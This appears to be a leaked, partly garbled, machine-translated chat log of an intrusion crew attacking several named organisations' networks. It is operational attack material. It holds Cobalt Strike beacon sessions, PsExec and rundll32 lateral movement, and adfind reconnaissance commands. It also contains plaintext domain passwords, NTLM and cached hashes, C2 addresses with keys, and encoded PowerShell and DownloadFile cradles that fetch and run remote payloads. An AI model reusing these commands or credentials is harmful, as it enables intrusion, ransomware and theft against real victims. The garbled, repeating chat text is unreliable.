 DENMSDC01 10.200.196.42
 LONMSDC02 10.210.4.42
 BEIMSDC02 192.168.120.28
 SHAMSDC02 192.168.140.3
 BOSMSDC01 10.200.228.42
 HKGMSDC01 192.168.230.42
 STURMSDC01 192.168.61.42
 PLNMSDC02 10.200.4.42
 MELMSDC01 10.220.68.42
 SHARMSDC02 10.220.136.42
 STURMSDC10 192.168.66.42
 STURMSDC20 192.168.67.42
 ROCMSDC01 10.200.100.42
 SFO2MSDC03 10.200.132.42
 STUGMSDC10 192.168.71.18

``This is all servers (filtered by ``Domain Controllers`` )
```
DETMSDC02
TOKMSDC01
SHARMSDC01
SYDMSDC01
SNGMSDC01
NYCMSDC01
AUSMSDC01
SFOAMSDC01
DENMSDC01
LONMSDC02
BEIMSDC02
SHAMSDC02
BOSMSDC01
HKGMSDC01
STURMSDC01
PLNMSDC02
MELMSDC01
SHARMSDC02
STURMSDC10
STURMSDC20
ROCMSDC01
SFO2MSDC03
STUGMSDC03
STUGMSDC10
LAXMSDC01

``Are the local admins? The enterpays, dc and ad infos? The domain admins
```
ELittleADM
JStriberADM
AMoultonADM
TMunsonADM
bigfix
ADAXES
pwwDirAdmin
``user7user5user2No session only ran it again and as you wrote inj will die right away, or later appear. injected dll and exeqq the last server ``
beacon> shell ping francedc1
[*] Tasked beacon to run: ping francedc1
[+] host called home, sent: 45 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.

[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

beacon> shell ping francedc1.rtpco.local
[*] Tasked beacon to run: ping francedc1.rtpco.local
[+] host called home, sent: 57 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Reply from 10.4.0.19: Destination host unreachable.

[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 1, Lost = 3 (75% loss),


``This is for @user7 found104....69480 pid I say that there is oneI have all ahk stand there is one live session that needs to be locked so check the ping- Check whether the registry entry was created with the bicon shell reg query HKCU\Environment to nasa cling to destroying```
on 10 armas: 0 file(s) copied. of them:

no 445:
    MFGWIN10-1: 10.0.0.110
    ENGINEERING-PC2: 10.1.4.205
    RYAN-GT73VR: 10.1.4.164
    SCCY-LT07: 10.0.0.26
    SCCY-05: 10.0.0.59
    SCCY-01: 10.0.0.76
    SCCY-03: 10.0.0.57

on dir under YES - Access is denied.
    SCCY-20: 10.1.4.221
    DESKTOP-UMQJ809: 10.1.4.230

us:
    SCCY-NAS: 10.1.4.175:445

    balls:
        Approved_Documentation
        Engineering
        IPC$
        Quality
        Tool_Room
        usbshare1
        
    all except usbshare1 are masked
        shell net use * \\10.1.4.175\usbshare1
        The password is invalid for \10.1.4.175/usbshare1.

        shell net use * \\10.1.4.175\usbshare1 /user:SCCY\vdsadmin T@ng0D0wn!
        System error 1219 has occurred.
        Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
``````
Total AD servers: 5
Live Servers: 2
Pulled servers: 2
 
Total armies in AD: 134
Live armies: 28
Artems attracted: 18
``````
209.222.101.167:10918
uVTxvMXJAvo6Vxsuw6iFhfu6YtstdU9kKPV
``Yeah, wait till 2 and then start giving it to you``OAFIJHS&GDFIysui76fUESY&GUISKRTjug``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=Xb7b59muRFPJqRcCR) yeah why not``cme smb 170.7.183.1 -u Administrator -p Csfixit3 --local-auth --lsa` to @tl2 can ask?i can't figure out if it's the other one)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=x58LFJ5uCgN46uASB) so it's not among them)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=9dZhAJKePR46j6kT3) so did you check if it's alive?
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 DCWAS01 170.7.2.220
 TNWAS01 170.7.14.203
 FLWAS01 170.7.20.220
 UKWAS01 170.7.70.210
 FRWAS02 172.25.168.125
 DRWAS01 170.7.132.51
``````
User name alexanm
Account active No
```
```
User name binnsv
Account active Yes
```
```
User name roeders
Account active Yes
```
```
User name lucase
Account active Yes
``````
* Username : Administrator
	 * Domain : WILSONART
	 * NTLM : 2caf37093fda2e2d172732487707cd31
          * Password : {}wallC2013
``This was taken through CrackMapExec. Is this even ntlm? found a live account?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=xqEcvAXwhW2iBLkp3) .hhz, while we check it? ``WILSONART.COM/alexanm:$DCC2$10240#alexanm#1104defc310747217d7ff2a4c987822e
WILSONART.COM/binnsv:$DCC2$10240#binnsv#e4e4edbc58ee8e74c18c5b6e05d78962
WILSONART.COM/roeders:$DCC2$10240#roeders#32b91b387aed7999ba32e38ea4926a78
WILSONART.COM/lucase:$DCC2$10240#lucase#431289c086694d207363fa44a1241269
WILSONART.COM/Administrator:$DCC2$10240#Administrator#927077252450f2289e35b2f7deb3d531 ``There sits yes - 170.7.183.1
192.168.1.6:445 - Success: '.\whsetup:Csfixit3' Administrator
```༼ つ ◕_◕ ༽つ normallyxp/7/10``WORKSTATION\Administrator:Csfixit3
```
170.7.120.128
170.7.123.36
170.7.181.244
170.7.120.174
170.7.30.50
170.7.180.26
170.7.180.21
170.7.180.83
170.7.159.83
170.7.180.16
170.7.183.1
170.7.12.205
170.7.12.114
170.7.180.19
170.7.8.19
170.7.120.13
170.7.122.41
170.7.120.165
170.7.121.70
170.7.182.20
170.7.180.18
170.7.180.82
170.7.181.242
170.7.122.153
170.7.76.133
170.7.120.1
170.7.182.59
170.7.181.242
170.7.180.131
170.7.183.41
170.7.183.36
170.7.159.83
170.7.121.87
170.7.120.146
170.7.180.133
170.7.180.134
10.69.246.13
170.7.180.137
170.7.122.115
170.7.121.62
170.7.121.86
170.7.120.154
170.7.120.118
170.7.121.44
170.7.122.153
170.7.120.167
170.7.121.45
170.7.183.1
170.7.183.50
170.7.180.18
170.7.120.151
170.7.120.121
170.7.121.148
170.7.120.100
170.7.12.114
170.7.123.44
170.7.180.16
170.7.123.36
170.7.120.174
170.7.120.165
170.7.182.90
170.7.171.200
170.7.120.127
170.7.120.115
170.7.191.11
170.7.191.85
170.7.182.58
170.7.121.117
170.7.121.9
170.7.121.70
170.7.180.70
170.7.182.99
170.7.182.95
170.7.182.37
170.7.180.69
170.7.183.18
170.7.182.20
170.7.182.27
170.7.182.18
170.7.183.243
170.7.181.244
170.7.182.83
170.7.180.89
170.7.180.89
170.7.182.17
170.7.49.11
170.7.183.71
170.7.49.13
10.100.49.72
170.7.49.15
170.7.49.16
10.100.49.77
170.7.120.151
170.7.180.26
170.7.180.21
170.7.180.83
170.7.180.82
170.7.181.124
170.7.181.123
10.100.22.69
170.7.120.126
10.102.66.33
170.7.12.205
10.102.66.32
170.7.171.185
170.7.122.115
170.7.76.115
170.7.76.116
192.0.0.26
192.0.0.31
10.77.8.53
170.7.30.50
170.7.182.58
``Even an administrator without rights) it's already on all the machines where it did not pass the server is not among them? great).Pass from the admin account and vhsfixit3 ``no) from the server?
Administrator:500:aad3b435b51404eeaad3b435b51404ee:476ae6f7f0259d84b82f33a4e55a88c5:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:17c9bb6e7168ad5e10483392f3a81ca4:::
whsetup:1001:aad3b435b51404eeaad3b435b51404ee:476ae6f7f0259d84b82f33a4e55a88c5:::
``````
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
alexanm bmccm fowlerh
lucase moorer2 owensd
petersm2 polyreyadmin roeders
solarwindsarm.svc vyombmccm
why don't you like cisks? are they on win-server? and the rest are bypassed[ ](https://mediaeveryone.com/group/wilsonart-com?msg=STBkdmLKvXLeWSCBE) here try[ ](https://mediaeveryone.com/group/wilsonart-com?msg=evkNa5rkpfaMrce68) here some cisks like those previous ones with the admin ball all bypassed? on these ten tens try to get patched zero here?the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's not. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing. the answer is no it's nothing.
Connecting to 10.102.71.35...
Starting PSEXESVC service on 10.102.71.35...
Connecting with PsExec service on 10.102.71.35...
Starting powershell.exe on 10.102.71.35...
PsExec could not start powershell.exe on 10.102.71.35..:

``Where have been - yes on all servers simantic stands? tpsh? with flags at startup disappears there moveszversky saymtek rub dllkuponjalma all so and replace with a point that, your messages can delete themselves) delete the case this last flags with one minus not rightly assembled ``
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=payload.bin -keep -self
``collect llvm here with kip and selfnova clean``.
23.82.140.215
https://expoless.com
----------------------------------------------------------------------------------------
104.171.123.166:45330
xubNIvoc8qkr10QFT2G68WprzDndxfBN0EP
``empty file change the coba does not work the same way as last time? but it does not work, i used to build with lvm builder, without the flag, that's the saved in the notes command are you still using the coba cleaner? you build llvm with your hands? it's more convenient without it ``
./shellConcatination --source=shellStarter_x64.dll --target=x64.dll --addBin=payload.bin

``that it disappears did you collect with what flag?
Shares for 170.7.5.54:
	[--- Listable Shares ---]
		ADMIN$
		C$
		D$
		NxT$
		NxTDeve$
		NxTPyqa$
		NxTTest$


Shares for 170.7.5.58:
	[--- Listable Shares ---]
		ADMIN$
		C$
		D$
		NxT$
		NxTDeve$
		NxTPyqa$
		NxTTest$

Shares for 170.7.5.57:
	[--- Listable Shares ---]
		ADMIN$
		C$
		D$
		NxT$
		NxTDeve$
		NxTPyqa$
		NxTTest$
``Yes and the dell disappears in both cases. The service starts and the session does not work too? rundll32.exe C:\Windows\Temp\x64.dll,why is not it separated by a comma?in the tpsh? now pingingvnneshku can see? in general, yes, let's check the server? Symantec what edr? what kind of axis? topsession does not fly startcobalt works?
beacon> remote-exec psexec 10.102.71.35 rundll32 C:\Windows\Temp\x64.dll entryPoint
[*] Tasked beacon to run 'rundll32 C:\Windows\Temp\x64.dll entryPoint' on 10.102.71.35 via Service Control Manager
[+] host called home, sent: 1805 bytes
[+] received output:
Started service 2aed3bf on 10.102.71.35
``Hmmm a psec?
ERROR:
Description = The RPC server is unavailable.
``Check osvmik is available''.
Shares for 10.102.71.35:
	[--- Listable Shares ---]
		ADMIN$
		C$

Shares for 10.102.70.83:
	[--- Listable Shares ---]
		ADMIN$
		C$

Shares for 10.102.72.34:
	[--- Listable Shares ---]
		ADMIN$
		C$
``hyperion_Service
waglobal2014[ ](https://mediaeveryone.com/group/wilsonart-com?msg=XnLhmrLKcJdQbWszZ) this is where we did it before...search from here `*HYPERION_ADMIN````
Global Group memberships *Austin_PW_Group *HYPERION_ADMIN
                             *Domain Users
``I gave a list``.
shell wmic /node:78186W7P os get osarchitecture
[*] Tasked beacon to run: wmic /node:78186W7P os get osarchitecture
[+] host called home, sent: 72 bytes
[+] received output:
Node - 78186W7P

ERROR:

Description = Access is denied.




``and don't flub like this``beacon> shell wmic /node:78186W7P os get osarchitecture``
\\78186W7P.Wilsonart.com\ADMIN$ - Remote Admin
\ED79161W10P.Wilsonart.com/ADMIN$ - Remote Admin
\79337W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\78192W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78204W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79220W10P.Wilsonart.com/ADMIN$ - Remote Admin
\73932W7P.Wilsonart.com/ADMIN$ - Remote Admin
\76869W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS25.Wilsonart.com/ADMIN$ - Remote Admin
\\DEVBIOBI.Wilsonart.comADMIN$ - Remote Admin
\EL79470W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\79196W10P.Wilsonart.com/ADMIN$ - Remote Admin
\74617W7P.Wilsonart.com/ADMIN$ - Remote Admin
\EL80143W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\78486W10P.Wilsonart.com/ADMIN$ - Remote Admin
\74496W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79855W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS84.Wilsonart.com/ADMIN$ - Remote Admin
\\VyomLabs4.Wilsonart.comADMIN$ - Remote Admin
\\HQTAS73.Wilsonart.comADMIN$ - Remote Admin
\\{\79127W10P.Wilsonart.com/ADMIN$ - Remote Admin
\78722W7P64.Wilsonart.com/ADMIN$ - Remote Admin
\73339W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74211W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78229W7E64.Wilsonart.com/ADMIN$ - Remote Admin
\77831W7P.Wilsonart.com/ADMIN$ - Remote Admin
\73368W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\TNTAS08.Wilsonart.com/ADMIN$ - Remote Admin
\ED79126W10P.Wilsonart.com/ADMIN$ - Remote Admin
\73747W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DRWAS07.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS39.Wilsonart.com/ADMIN$ - Remote Admin
\74172W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIWEB.Wilsonart.comADMIN$ - Remote Admin
\EL76306W7E.Wilsonart.com/ADMIN$ - Remote Admin
\79146W10P.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS98.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIPLN.Wilsonart.comADMIN$ - Remote Admin
\77374W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74081W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DT03W7P64.Wilsonart.com/ADMIN$ - Remote Admin
\73313W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78172W10P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\HeathDesktop.Wilsonart.com/ADMIN$ - Remote Admin
\EL79448W10P.Wilsonart.com/ADMIN$ - Remote Admin
\77953W7E32.Wilsonart.com/ADMIN$ - Remote Admin
\75516W7P.Wilsonart.com/ADMIN$ - Remote Admin
\77956W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIESS.Wilsonart.comADMIN$ - Remote Admin
\77830W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DCWAS03.Wilsonart.com/ADMIN$ - Remote Admin
\\73346W7P.Wilsonart.comADMIN$ - Remote Admin
\EL79469W10P.Wilsonart.com/ADMIN$ - Remote Admin
\74494W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78070W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74205W7P.Wilsonart.com/ADMIN$ - Remote Admin
\74015W7P.Wilsonart.com/ADMIN$ - Remote Admin
\77195W7P.Wilsonart.com/ADMIN$ - Remote Admin
\78210W7P.Wilsonart.com/ADMIN$ - Remote Admin
\76801W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79151W10P.Wilsonart.com/ADMIN$ - Remote Admin
\ITWDS02.Wilsonart.com/ADMIN$ - Remote Admin
\79904W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\74181W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79192W10P.Wilsonart.com/ADMIN$ - Remote Admin
\77403W10P.Wilsonart.com/ADMIN$ - Remote Admin
\78715W10P.Wilsonart.com/ADMIN$ - Remote Admin
\UKWAS01.Wilsonart.com/ADMIN$ - Remote Admin
\L79009W10P.Wilsonart.com/ADMIN$ - Remote Admin
\\{\73689W7P.Wilsonart.com/ADMIN$ - Remote Admin
\73923W7P.Wilsonart.com/ADMIN$ - Remote Admin
\79214W10P.Wilsonart.com/ADMIN$ - Remote Admin
\DCVEEAM02.Wilsonart.com/ADMIN$ - Remote Admin
\ED79160W10P.Wilsonart.com/ADMIN$ - Remote Admin
\76406W7E64.Wilsonart.com/ADMIN$ - Remote Admin
\73860W7P.Wilsonart.com/ADMIN$ - Remote Admin
\dcwas88.Wilsonart.com/ADMIN$ - Remote Admin
\ES79799W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\78179W7P.Wilsonart.com/ADMIN$ - Remote Admin
\75537W7P.Wilsonart.com/ADMIN$ - Remote Admin
\76032W10E.Wilsonart.com/ADMIN$ - Remote Admin
\75574W7P.Wilsonart.com/ADMIN$ - Remote Admin
\\QABIHFM.Wilsonart.comADMIN$ - Remote Admin
\\DDCWAS09.Wilsonart.comADMIN$ - Remote Admin
\EL77610W10E.Wilsonart.com/ADMIN$ - Remote Admin
\PRDBITAB.Wilsonart.com/ADMIN$ - Remote Admin
\78220W7P.Wilsonart.com/ADMIN$ - Remote Admin
\EL80150W10P64.Wilsonart.com/ADMIN$ - Remote Admin
\LWDA-DC.Wilsonart.com/ADMIN$ - Remote Admin
\78167W7P.Wilsonart.com/ADMIN$ - Remote Admin
\DT01W7P64.Wilsonart.com/ADMIN$ - Remote Admin
\78735W10E64.Wilsonart.com/ADMIN$ - Remote Admin
\80109W10P.Wilsonart.com/ADMIN$ - Remote Admin
\78140W7P.Wilsonart.com/ADMIN$ - Remote Admin
``170.7.5.11a well you do it in front of me
104.243.44.69:13574
Cqr7797e1iSJyzFwnyTPoECVpWqqOSUGUZ7
``and the session under the token polzakaday access to kobud[ ](https://mediaeveryone.com/group/wilsonart-com?msg=SQHQuPXRXCcnJHStn) you mean to say that nothing shot?com/group/wilsonart-com?msg=eg7axbgv8FLsY22FG) yes it took out all the balls, not even available)) fucking laugh if you're laughing ishell dir \\\share\C$ does not give anything at alla?These balloons aren't opening. Is this the domain controller?\\LWDA-DC.Wilsonart.com\ADMIN$ - Remote Admin170.7.5.19170.7.14.20469:1488 uy (@tl2 there are no kerbs from here yet?exe -nop -w hidden -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AGkAZABlAGkAbwAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBjAHMAcwAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AbQBpAG4ALgBjAHMAcwA/AHYAaQBkAD0ARABBAEcANABBAHEAUgBLAHQATwB1AFAATwB6AG0AZgB0AE4AcwBNAHIAcABiADEAaQBhADQAMgBZAGYAQwBBAFIAaABVAGMAQwB4ADYAUAAnACkAKQA7AA==http://45.126.210.66:8080/Bl0vJ08/231.msi>http://dropmefiles.com/XXwJl0.dead.pkgprod.com there's no one else to go to) more like this: and you know what this means?) right!
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt

``How is it ``get the right hell info``? and kerbs get the right hell infoa do you know what it means?))fuck 30 trustadministrations no da da@tl2 do not forget to downloadcomps are downloaded found on the machine TightVNC but where the configs no idea throw the standard output of programs filez from different workstations and study the FS of workstations exactly nado search confignu means somewhere is some VPN where almost anyone can go ...look for "correct" link to loginpolya)lolcreeds of users in the browsers more preciselythat if there are pointers to Citrix it makes sense to check the creeds of users browsersIt seems that machines with Citrix as provides stable access thin clients also live alternative to VPNRemote/Citrix/VPN something like that in AD there are pointers to VPN? in users or cars we searched in neighboring computers - about 20-25 probably checked
no signs of software found (in other cases, it makes sense to search for relevant processes or signs of installed software@user1 well, this is for "native" vpn as i understand? so, what about the config? do you have a session? how to promote? it does not work with Citrix? no sessions as i understand no? parsing is working with the network via kmd, trying to raise the rights without backconnect parsing is what? 1) dns tunneling
2) parsing WITHOUT EXTERNAL CONNECTION This is where the fun part starts.
we have two options really do not (no))) now look whether there is no external at all? tried powershell command generated input - seems to run but no session they are swearing at something, and what I did not have time to understandһttp://gist.githubcom/ethack/110f7f46272447828352768e6cd1c4cb through downloadstring and iche easier to do so, or rather not from a file but from a buffer possible to make an intermediate input script which from a file will emulate keystrokes, did it when they had to without a buffer large lines to type manually = )))) there clipboard does not work - any ideas how? one of "chips" Citrix
if the kmd is already running - it won't close even if the citrix session dieshttp://cobaltstrike.com/help-externalc2 then the session will stay alive and if the kmd opens the host is back:confused:Hello!:metal:hello everybody)I think something like `powershellexe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")
NOT via rdp
```
I wrote above startup of usual applications is logged simply, those which have already been marked as "current"
plus if a user comes in at the time of the work and sees the new ones on his dashboard... Well, in general there is no need)) and use those that are available, they "can" go up in the allowed applications should not make changes Passage to the webserver from the frontend, if it will be much later, it is a very vast topic and requires a fairly deep understanding of web technologies, well, at least when we are not talking about vulnerabilities wordpress blogs = )This "basic" checklist for citrix escapehttps://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/цитрикс is a thin client, but still it is webvpn which is almost always tied up
https://sf.primeinc.com/vpn/index.html
ziegd
SuperbowlChamps20
```

call kmd = )
NOT through rdpna collective intelligence))so, a practical taskpohyalnaya, now namut...we do not haveGood morning. Any live sessions for further practice? Good morning, Monday at what time? Send the code to the email0.dead.snu.edu)) are there more networks?
in the appendix is spinning endlessly under all users and from several dedicates
web page does not open (check all hosts account
if it is valid somewhere - try to crash on rdp``
dn:CN=Event User 01,OU=Events,OU=SNU,DC=ad,DC=snu,DC=edu
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Event User 01
>sn: User
>description: SNU!2ocks Default - 23Testing! Concussion
>givenName: Event
>distinguishedName: CN=Event User 01,OU=Events,OU=SNU,DC=ad,DC=snu,DC=edu
>instanceType: 4
>whenCreated: 20160119155159.0Z
>whenChanged: 20210106164017.0Z
>displayName: Event User 01
>uSNCreated: 66802
>memberOf: CN=Event Access,OU=Events,OU=SNU,DC=ad,DC=snu,DC=edu
>memberOf: CN=Lab Access,OU=Groups,OU=Users and Groups,OU=SNU,DC=ad,DC=snu,DC=edu
>memberOf: CN=Testing Center Printing,OU=Groups,OU=Users and Groups,OU=SNU,DC=ad,DC=snu,DC=edu
>uSNChanged: 25883282
>name: Event User 01
>objectGUID: {C8B96D46-4384-4E0B-922D-5DAB93CC0BBF}
>userAccountControl: 512
>badPwdCount: 0
>codePage: 0
>countryCode: 0
>homeDirectory: \atlantis\data\users\eventuser01
>homeDrive: W:
>badPasswordTime: 132551271550074552
>lastLogoff: 0
>lastLogon: 132551272172896078
>pwdLastSet: 132461210014856025
>primaryGroupID: 513
>objectSid: S-1-5-21-345900591-3691298009-1159447958-9865
>accountExpires: 9223372036854775807
>logonCount: 210
>sAMAccountName: eventuser01
>sAMAccountType: 805306368
>userPrincipalName: eventuser01@ad.snu.edu
>lockoutTime: 0
>objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=ad,DC=snu,DC=edu
>dSCorePropagationData: 20191224181403.0Z
>dSCorePropagationData: 20191224181400.0Z
>dSCorePropagationData: 16010101000417.0Z
>lastLogonTimestamp: 132544248075062010
``````
Pinging GTZCH1ADC01.GlobalTranz.local [10.222.3.20] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.3.20:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZMSPADC02.GlobalTranz.local [10.222.1.30] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.1.30:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZSLCADC01.GlobalTranz.local [10.222.2.20] with 32 bytes of data:
Reply from 10.222.2.20: bytes=32 time=26ms TTL=124

Ping statistics for 10.222.2.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 26ms, Maximum = 26ms, Average = 26ms

Pinging GTZPSVADC02.GlobalTranz.local [10.222.5.30] with 32 bytes of data:
Reply from 10.222.5.30: bytes=32 time=8ms TTL=125

Ping statistics for 10.222.5.30:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 8ms, Maximum = 8ms, Average = 8ms

Pinging GTZMSPADC01.GlobalTranz.local [10.222.1.20] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.1.20:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZAZRADC01.GlobalTranz.local [172.24.2.10] with 32 bytes of data:
Reply from 172.24.2.10: bytes=32 time=38ms TTL=128

Ping statistics for 172.24.2.10:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 38ms, Maximum = 38ms, Average = 38ms

Pinging GTZAZRADC02.GlobalTranz.local [172.24.2.20] with 32 bytes of data:
Reply from 172.24.2.20: bytes=32 time=33ms TTL=128

Ping statistics for 172.24.2.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 33ms, Maximum = 33ms, Average = 33ms

Pinging GTZCH1ADC02.GlobalTranz.local [10.222.3.30] with 32 bytes of data:
Request timed out.

Ping statistics for 10.222.3.30:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZPSVADC01.GlobalTranz.local [10.222.5.20] with 32 bytes of data:
Reply from 10.222.5.20: bytes=32 time=7ms TTL=125

Ping statistics for 10.222.5.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 7ms, Maximum = 7ms, Average = 7ms

Pinging GTZSLCADC02.GlobalTranz.local [10.222.2.30] with 32 bytes of data:
Reply from 10.222.2.30: bytes=32 time=27ms TTL=124

Ping statistics for 10.222.2.30:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 27ms, Maximum = 27ms, Average = 27ms

Pinging GTZMS2ADC02.GlobalTranz.local [10.0.61.34] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.61.34:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZMS2ADC01.GlobalTranz.local [10.0.61.33] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.61.33:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZCH2ADC01.GlobalTranz.local [10.222.4.20] with 32 bytes of data:
Reply from 10.222.4.20: bytes=32 time=51ms TTL=124

Ping statistics for 10.222.4.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 51ms, Maximum = 51ms, Average = 51ms

Pinging GTZPHXADC01.GlobalTranz.local [10.222.0.100] with 32 bytes of data:
Reply from 10.222.0.100: bytes=32 time=28ms TTL=127

Ping statistics for 10.222.0.100:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 28ms, Maximum = 28ms, Average = 28ms

Pinging GTZCH2ADC02.GlobalTranz.local [10.222.4.30] with 32 bytes of data:
Reply from 10.222.4.30: bytes=32 time=44ms TTL=124

Ping statistics for 10.222.4.30:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 44ms, Maximum = 44ms, Average = 44ms

Pinging GTZPHXADC02.GlobalTranz.local [10.222.0.200] with 32 bytes of data:
Reply from 10.222.0.200: bytes=32 time=24ms TTL=127

Ping statistics for 10.222.0.200:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 24ms, Maximum = 24ms, Average = 24ms

Pinging GTZTULADC01.GlobalTranz.local [10.0.40.41] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.40.41:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

Pinging GTZTULADC02.GlobalTranz.local [10.0.40.42] with 32 bytes of data:
Request timed out.

Ping statistics for 10.0.40.42:
    Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),

``We should have taken the hash check off not yes''.
Pinging GTZAZRCASUB01.GlobalTranz.local [172.24.2.8] with 32 bytes of data:
Reply from 172.24.2.8: bytes=32 time=27ms TTL=128

Ping statistics for 172.24.2.8:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 27ms, Maximum = 27ms, Average = 27ms

beacon> shell net use \\172.24.2.8\c$ "MountainD3w!"/user:GlobalTranz.local\joel.reed
[*] Tasked beacon to run: net use \\172.24.2.8\c$ "MountainD3w!" /user:GlobalTranz.local\joel.reed
[+] host called home, sent: 103 bytes
[+] received output:
System error 5 has occurred.

Access is denied.

But getting up would certainly be a good idea right now, imho.
tomorrow if everything survives - krepaneu quietly and you can go to the inspection on any servachek you try there? on dc not over the e probably all in a slip? zakruglyatsyaa me here does not want to fly session from there) only easier i will take tomorrow more vpns suchdobii tomorrow while i have no current accessa then get up sooner wrap up for today, here you and the entrance to another domain) ```but you have to get up now and go to the other side of the house) ¶¶
Pinging GlobalTranz.local [10.222.0.100] with 32 bytes of data:
Reply from 10.222.0.100: bytes=32 time=28ms TTL=127

Ping statistics for 10.222.0.100:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
